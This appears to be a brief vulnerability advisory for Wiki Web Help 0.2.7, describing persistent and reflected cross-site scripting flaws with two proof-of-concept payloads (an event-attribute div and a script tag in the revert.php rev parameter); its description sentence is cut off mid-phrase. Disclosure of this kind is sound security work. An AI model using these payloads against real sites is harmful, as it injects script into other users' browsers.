Search
Software Vulnerability Tested On Date
Wiki Web Help 0.2.7 Persistent/Reflected Cross-site Scripting Windows Vista + XAMPP 7/1/2010
Description
A vulnerability in Wiki Web Help 0.2.7 can be exploited to .
Exploit
Persistent: Event attributes are not removed from user submitted HTML elements. Reflected: The rev query string field of revert.php does not HTML encode user submitted data.
Proof of Concept
Persistent: <div onmouseover="alert(0)" style="margin:-500px;width:9999px;height:9999px;position:absolute;"></div>

Reflected: http://localhost/wwh/revert.php?rev=%3Cscript%3Ealert(0)%3C/script%3E